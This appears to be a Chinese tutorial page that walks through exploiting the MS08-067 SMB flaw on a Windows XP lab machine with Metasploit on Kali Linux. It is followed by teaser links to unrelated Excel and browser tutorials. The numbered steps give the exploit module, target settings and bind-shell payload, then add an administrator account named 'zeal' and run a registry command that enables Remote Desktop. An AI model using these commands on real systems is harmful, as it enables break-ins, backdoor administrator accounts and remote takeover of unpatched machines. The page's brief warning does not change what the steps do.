kalilinux攻击漏洞MS08 067
在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境, kalilinux: winxp 要做的就是用Kali Linux里的Metasploit入侵WinXP
操作方法
(01)在Kali用命令 msfconsole 开启Metasploit (在终端里输入msfconsole)
(02)然后运行命令:use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序
(03)set LHOST #设置本地主机IP
(04)set RHOST #设置目标主机IP
(05)set payload windows/shell_bind_tcp #设置payload
(06)show options #查看设置信息
(07)exploit #实施攻击
(08)攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。
(09)添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况
(10)发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
(11)有了目标主机的cmdshell你想做什么不行吧?
(12)好了演示到此完毕!
特别提示
不要随便攻击别人,漏洞基本都修复了。
命令注意大小写
目标的winxp最好是英文的
-
Excel中身份证号计算年龄公式是什么
Excel是一款电子表格软件,直观的界面、出色的计算功能和图表工具,再加上成功的市场营销,使Excel成为最流行的个人计算机数据处理软件。那么EXCEL中身份证号计算年龄公式是什么呢,下面我们就来了解一下。操作方法(01)在单元格中输入“=2018-MID(D4,7,)”。(02)D4表示身份证...
-
打开浏览器总是弹出搜狗网址导航怎么办
当打开浏览器总是会弹出一些提示,邀你吧该浏览器设置为默认浏览器,这是怎么把这个提示关闭呢?操作方法(01)首先我们先打开IE浏览器,在右上角找到设置菜单栏,点击“工具”选择其中的“Internet”选项。(02)点击进入主页,就能看到默认的网页导航网址,更改默认网址,把自己喜欢...
-
光盘刻录大师免费版图文使用教程
光盘刻录大师是涵盖了数据刻录、光盘备份与复制功能的软件,其用户使用评价好错参半,见仁见智吧。现在网上也流行使用光盘刻录软件大师免费版,今天就把光盘刻录软件大师免费版的图文使用教程教给大家:操作方法(01)打开刻录软件后,从右上角开始,我们可以看到有“添加视...
-
EXCEL如何锁定单元格(锁定的单元格不能修改)
有的表格设定好后,需要发给其他部门进行填写,但有的人喜欢按自己的习惯进行更改,造成项目无法统计和识别,如何锁定这些单元格呢,听我说一说(WPS操作相同)操作方法(01)表设计完成之后,首先右键点选右上角的空白处,实现表格全选。(02)在右键快捷菜单中选择“设置单元格格式”,...